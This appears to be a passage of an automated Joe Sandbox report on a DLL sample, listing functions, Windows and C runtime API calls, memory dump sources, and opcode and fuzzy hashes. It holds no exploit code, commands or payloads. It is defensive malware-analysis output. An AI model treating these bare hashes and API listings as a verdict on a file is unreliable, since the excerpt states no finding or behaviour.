Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 6b8b3ed6cb5972614f8c4c7c06f4f707091cd7fd0611f5a4994f55a05dcff567
Instruction ID: 849038567d5597ef2b9b6c45c8ec7c6195663e1a7179335574a5c69fe1884768
Opcode Fuzzy Hash: 6b8b3ed6cb5972614f8c4c7c06f4f707091cd7fd0611f5a4994f55a05dcff567
Instruction Fuzzy Hash: FA31197290C91ABADB11EBFAAC85EBFBA6CDB51356F140056FD04D6141E9348F0893F1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE86D4 Relevance: 1.6, APIs: 1, Instructions: 132libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,00CE821A,MqtNqt,?,?,?,?), ref: 00CE8740

Memory Dump Source

Source File: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_ce0000_loaddll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5b0a301958f9b14c3ed8f5414731aee123fd3e563d2c63ed9dfabb699d54c5f0
Instruction ID: 5d85e69c5f44e4a5e97756284246f80f8d0df528cdec1947a4e536d890d1086a
Opcode Fuzzy Hash: 5b0a301958f9b14c3ed8f5414731aee123fd3e563d2c63ed9dfabb699d54c5f0
Instruction Fuzzy Hash: 2351A575A00209DFCF08CF99C890AEEB7B2FF88314F148159E919AB395C734AA55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 009564B9 Relevance: 1.6, APIs: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 009564DF

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 881399c16315aee80e1901387c95084612f5d09e0e457e887eb5e4a90b479059
Instruction ID: 9623dd0fd5e3834e0856c8c21e3f8f29719463a164d0cbb6fbe2bf045b548f90
Opcode Fuzzy Hash: 881399c16315aee80e1901387c95084612f5d09e0e457e887eb5e4a90b479059
Instruction Fuzzy Hash: 4121F376804204EFCB20DF90ED45A697775FB0032AF60026DFA11A76A1F3B06E5DEB00

Uniqueness

Uniqueness Score: -1.00%

Function 00953711 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00953781

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Part of subcall function 0095A583: _malloc.LIBCMT ref: 0095A5AA
Part of subcall function 0095A583: _memset.LIBCMT ref: 0095A5D8

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap_memset
String ID:
API String ID: 3655941445-0
Opcode ID: 1c088eab4facbf943462ba58458413e3756e96e0e62599ee15e4fa022353b743
Instruction ID: 509264f7fd48c1d51cd0a158e978e78865fbe24117df9b2ebf86b291dfb57a69
Opcode Fuzzy Hash: 1c088eab4facbf943462ba58458413e3756e96e0e62599ee15e4fa022353b743
Instruction Fuzzy Hash: F20104F1E043009FEB24EF3AAC06B2937A5AB98322F20C61EEA154F3D1E67595089744

Uniqueness

Uniqueness Score: -1.00%

Function 009513C2 Relevance: 1.5, APIs: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 009513D6

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Part of subcall function 0095A583: _malloc.LIBCMT ref: 0095A5AA
Part of subcall function 0095A583: _memset.LIBCMT ref: 0095A5D8

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap_memset
String ID:
API String ID: 3655941445-0
Opcode ID: 25c4d652c8cd6cb2ebc280ab24ac96a65720f3d33de003b94062dc893d4ed22f
Instruction ID: 0f5fd8a9c3a8450e1634e8d6458e8ddb3eb0ce5795dbc179f77e6dab3fa876c1
Opcode Fuzzy Hash: 25c4d652c8cd6cb2ebc280ab24ac96a65720f3d33de003b94062dc893d4ed22f
Instruction Fuzzy Hash: AA01DF718142156BDB20EF16DC42F6A379CEB41715F004039FC28EB261E7B1A848CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00950D24 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00950D33

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: c35cc7a4560c89a8956fe71e8a123893470b57a4c90d929bbdcd2ff211574565
Instruction ID: 250733314518c8fd43627039ce0e8630b663d370b2278b20cd8eacf38c582db1
Opcode Fuzzy Hash: c35cc7a4560c89a8956fe71e8a123893470b57a4c90d929bbdcd2ff211574565
Instruction Fuzzy Hash: 17F02D36600315ABD701FFEAEC43A9E33689FC1321F004635FC04BB241EA70AC1987A1

Uniqueness

Uniqueness Score: -1.00%

Function 009577CC Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00957815

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 23ff309e8046e796af9dd13b083f41f431b164eabda20d9c4d7b55ebeddf9048
Instruction ID: 18202660b8f0b1f332a53b039dd5f892f9c2c482335d1a0eaf475bf465ee6f58
Opcode Fuzzy Hash: 23ff309e8046e796af9dd13b083f41f431b164eabda20d9c4d7b55ebeddf9048
Instruction Fuzzy Hash: 62F09071900618ABCB11FBA5E4C1A9EF7A8AB44389F008418F99967501D630EA858BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00956A47 Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

ProcessIdToSessionId.KERNELBASE(00986E64,?,?,?,?,?,00956AB6), ref: 00956A5D

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 29c3f22be8384834254bc5a24040b08057b5a545b5b25e0ed00d6c08326046b2
Instruction ID: 92d24e693af16f237c0c240d1b980311658ab87d44be4ae8b478d6ed6a768ad6
Opcode Fuzzy Hash: 29c3f22be8384834254bc5a24040b08057b5a545b5b25e0ed00d6c08326046b2
Instruction Fuzzy Hash: F6E01272A24119FF9F00DBE6DD45C9B7BACDA043857804451E902E3100E770FE449BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0095788E Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,00976150,?,?,00957A2D,00000000,00000000), ref: 009578C0

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5dee72ba5360306976497db3f5f683de985603d8572312bfad0942da5486fa19
Instruction ID: 1470bb800ddce9bfad5a4e95c4bd036095da949cfe7776f26b369368c4c60c18
Opcode Fuzzy Hash: 5dee72ba5360306976497db3f5f683de985603d8572312bfad0942da5486fa19
Instruction Fuzzy Hash: 53E01232604504BBDF115BA6EC09E9ABFADEB44665F104065F90591160E771DE04AB54

Uniqueness

Uniqueness Score: -1.00%

Function 0095F9F9 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0095FA00

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: debf3e481fdb8f6396b9837c79bb90d05f14ccda41c4c5dac5ab2216717bd9f7
Instruction ID: a5f6378700fc5df5cbf1cf09d93bade9b613545b671fdb829e45eb9676398173
Opcode Fuzzy Hash: debf3e481fdb8f6396b9837c79bb90d05f14ccda41c4c5dac5ab2216717bd9f7
Instruction Fuzzy Hash: A4E01A722086014FD728CE2DF850A06A7E19BD5330B21CA3EE4AAD7385E638A4818B04

Uniqueness

Uniqueness Score: -1.00%

Function 00951CF0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00951D0E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: ea62511e5b99a32abdabeabc6a7593a38c7ec296b597612a47b8b872f458f4b7
Instruction ID: 2c6f66ab4ec652584b9779712ddf118d769d6b784dd7e2df7a70f1bf92be4268
Opcode Fuzzy Hash: ea62511e5b99a32abdabeabc6a7593a38c7ec296b597612a47b8b872f458f4b7
Instruction Fuzzy Hash: 59E012B5E4420966E760E660AC06B9577AC6B04705F4440B0A948E51C2EAA4A64C4FD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8D24 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000000,00000000,00000020,00000004,00000000), ref: 00CE8D4E

Memory Dump Source

Source File: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_ce0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
Instruction ID: 3c2e3cf2c61270f0856e9a38ebadd5071b6b17c14710b6159caa586f64d0b1e9
Opcode Fuzzy Hash: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
Instruction Fuzzy Hash: 1AE01A3150024DEBDF18CF45DD44BAA33A8AB44711F00855AF928462D0DB71EF58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00965DC3 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00965AFF,?), ref: 00965DD8

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f89f864ebe0ca9a067e93a5a9c3f2e90a37cedae73de392f466b4ae96e6d3aa4
Instruction ID: 478d6504e542e9a9ccf79ec42cbb093be6d0fb510ee26d004d145fed5b2b9901
Opcode Fuzzy Hash: f89f864ebe0ca9a067e93a5a9c3f2e90a37cedae73de392f466b4ae96e6d3aa4
Instruction Fuzzy Hash: C8D05E366687045EDB009FB0BC097223BDC9388395F158436B81DC62A0E671C580EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0095074B Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00950759

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: FreeHeap___sbh_find_block___sbh_free_block__lock_memset
String ID:
API String ID: 1456850174-0
Opcode ID: 15c1970eb93ddb1a3caa8f1eca5c6bda61fc0aae5aa39237ba1e882723eafb69
Instruction ID: d0bc7e77fdf3687caa7c28b39240b56e08fceebde10226b8beccc27fc2774bb1
Opcode Fuzzy Hash: 15c1970eb93ddb1a3caa8f1eca5c6bda61fc0aae5aa39237ba1e882723eafb69
Instruction Fuzzy Hash: 89C0127B400118BBDB113E84DC02F85BBADDF443A0F504865F68856161D66378705BC4

Uniqueness

Uniqueness Score: -1.00%

Function 00950669 Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0095066F

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9e7fa2cffc3bb24a1e6c49ee293ca53403134d5182beaa2c90c2b47ff901bd3e
Instruction ID: 01ddcc067e5203941195214bca77b4e42de23c860faec2d1137a7c0fb7bc2f53
Opcode Fuzzy Hash: 9e7fa2cffc3bb24a1e6c49ee293ca53403134d5182beaa2c90c2b47ff901bd3e
Instruction Fuzzy Hash: 25C08C3420800CEB8B00EE09E8419E83BD5DB88330B20C211F8188B201CB31E9108780

Uniqueness

Uniqueness Score: -1.00%

Function 00968DE0 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 00968DE2

Part of subcall function 00968D6E: RtlEncodePointer.NTDLL(00000000,?,00968DE7,00000000,0096CB45,00982368,00000000,00000314,?,00966E3B,00982368,009768D8,00012010), ref: 00968DD5

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: d29b32b9eab8e64a0bda7a974a2b381a4f79c11be675db21c4d5de063e3b153b
Instruction ID: 9ae6dc97731d3fb14e9205b51d61060dbc4f248d34ef3fda82de0adf7abfb80d
Opcode Fuzzy Hash: d29b32b9eab8e64a0bda7a974a2b381a4f79c11be675db21c4d5de063e3b153b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00957C14 Relevance: 1.3, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00957C8A

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7f06918df19dc2d4c0117cbe0aa34a6c48908ae5dcd1c42117e8f9bf69a8362
Instruction ID: dc741233ce33791f44af4ea4f6a21c26bae044782bcad975a5c0e0bc8932b204
Opcode Fuzzy Hash: c7f06918df19dc2d4c0117cbe0aa34a6c48908ae5dcd1c42117e8f9bf69a8362
Instruction Fuzzy Hash: 8F11C431919516DADB20DBA7ED09FAEB76CAF50313F004025EC459B250C774DE89CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00972CD0 Relevance: 3.1, Strings: 2, Instructions: 612COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0097304C
<, xrefs: 00973056

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: 4a6f916157f3da5f80178d3e441a16be348a6fb1c115ed379150304907fb6fe5
Instruction ID: 970c7e8c9aedbda0d8e947c173232e332abe48b7ea81f60ef837a51502037b07
Opcode Fuzzy Hash: 4a6f916157f3da5f80178d3e441a16be348a6fb1c115ed379150304907fb6fe5
Instruction Fuzzy Hash: 6C52E675A101598FDB08CF69C491AADBBF1FF8D300F14C16AE869AB352C234E951DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00973B20 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c8b86c6f0e0dab19f68a553a2793d1e67c4fd9ffb8b7c4239a43fe2d3ff925
Instruction ID: 1c28aabd61e6b79090ca608871ca72d42f8fa07c0cc144115f73a75028b24b22
Opcode Fuzzy Hash: f9c8b86c6f0e0dab19f68a553a2793d1e67c4fd9ffb8b7c4239a43fe2d3ff925
Instruction Fuzzy Hash: 6B1293329241598FDB04CF5DDC91ABDBBF1EF89301F04816EE45A9B386CA38EA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00973550 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2827441a2985acdda857e11d7a724694a3913d8208f2b2534b9cb1d1f917e9
Instruction ID: 7f5da0fca8ca30297a79da30ff387954528b2756220efec329bfa41d013569ef
Opcode Fuzzy Hash: ba2827441a2985acdda857e11d7a724694a3913d8208f2b2534b9cb1d1f917e9
Instruction Fuzzy Hash: 681270729241598FDB04CF5DD8919BDBBF1FF89300F44816EE45AAB382C638E651DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE9004 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_ce0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: d54acbd0041cb7c135afdd46b0c1833fd18c7db2e20e4d0c81eb0b5080d6b305
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 5E91BD74E0024ADFCF08CF8AC5909AEBBB2FF89304F248159D911AB315D335AA81DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8374 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_ce0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: 2385b6a33c30ee59305e86fb34b8a6509b016e5a60d670ff78424064b7576947
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 4D91E2B4E0125ACFCF08CF8AC5909AEBBB1FF48304F249159D9256B355DB30AA81DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00953541 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction ID: c0658f7755aa43e4c952f04d92d50bfba0bbd6772f3d9885dd6b7fdb2db87bc2
Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction Fuzzy Hash: A841B135600605EFCB29CF1AC881969BBF1FF99391B25C06DE89A8B312D231EE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009614EB Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 36e2f2970d59d14bb87350f8da8d52a4133872369c87b790d7f43cc734b49a18
Instruction ID: 59e4f34ab9e5c7847a70f461add3809fc938860921c49d708c3918aae56ad7ae
Opcode Fuzzy Hash: 36e2f2970d59d14bb87350f8da8d52a4133872369c87b790d7f43cc734b49a18
Instruction Fuzzy Hash: E8413C76E00209AFDB04DFA9C881AEEF7F5FF88310F198569E916E7345D634AA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00959B9D Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00959BAE

Part of subcall function 0096587E: __aulldiv.LIBCMT ref: 009658A9

_malloc.LIBCMT ref: 00959BD7
_strncpy.LIBCMT ref: 00959BF7
_strtok.LIBCMT ref: 00959C0E
_strtok.LIBCMT ref: 00959C2D

Part of subcall function 009657BD: __getptd.LIBCMT ref: 009657DB

__time64.LIBCMT ref: 00959C3F
__time64.LIBCMT ref: 00959CCE
__time64.LIBCMT ref: 00959D6A

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __time64$_strtok$__aulldiv__getptd_malloc_strncpy
String ID:
API String ID: 3363204686-0
Opcode ID: 7b65f05cf34a9d0fc2407498d2a3910b1aadeee8d0f19b68bc424009feaf14aa
Instruction ID: 31c7516f57a7920370786e0a6a1c3e6d245a2cc8bc6c9be381f8c767b7a6508b
Opcode Fuzzy Hash: 7b65f05cf34a9d0fc2407498d2a3910b1aadeee8d0f19b68bc424009feaf14aa
Instruction Fuzzy Hash: 675135B4828244DFDB14DF6AED805687BB9F789312710813EF8998B3A5D7319985FF40

Uniqueness

Uniqueness Score: -1.00%

Function 0096526C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 009652CE
_memcpy_s.LIBCMT ref: 00965343
__fileno.LIBCMT ref: 009653A3
__read.LIBCMT ref: 009653AA
__filbuf.LIBCMT ref: 009653CE
_memset.LIBCMT ref: 00965414
_memset.LIBCMT ref: 0096543F

Part of subcall function 00965D7A: __getptd_noexit.LIBCMT ref: 00965D7A

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: f2748b9ac05738f6bab804d0fbd8377ff57ac150031be4a8a054e13d07a47c2c
Instruction ID: cb3ce234b2374afbc0fcc10ec540514b7b4e9fdd9df0fdca2444223986949383
Opcode Fuzzy Hash: f2748b9ac05738f6bab804d0fbd8377ff57ac150031be4a8a054e13d07a47c2c
Instruction Fuzzy Hash: B4513B70900A04EFCB209F69CC44A9EBB79FF81360F268659F835962E1E7708D91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0095A76A Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0095A771

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_malloc.LIBCMT ref: 0095A77E
_malloc.LIBCMT ref: 0095A799
__snprintf.LIBCMT ref: 0095A7AC
_malloc.LIBCMT ref: 0095A7CB

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap__snprintf
String ID:
API String ID: 3929630252-0
Opcode ID: 993604a9dc949f59d7f4c63abfcd3a106d42731049c70ffccc7d6fc596819893
Instruction ID: ec9907addf20d787abba3400cf6b70563cfd4139583cd873b77388967c319552
Opcode Fuzzy Hash: 993604a9dc949f59d7f4c63abfcd3a106d42731049c70ffccc7d6fc596819893
Instruction Fuzzy Hash: 640181719443056FD710AFB9DC85E97BFECEFA5750F00892AF499CB201DAB4E9448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00964BFF Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE

Download Yara Rule

APIs

__flush.LIBCMT ref: 00964CC3
__fileno.LIBCMT ref: 00964CE3
__locking.LIBCMT ref: 00964CEA
__flsbuf.LIBCMT ref: 00964D15

Part of subcall function 00965D7A: __getptd_noexit.LIBCMT ref: 00965D7A

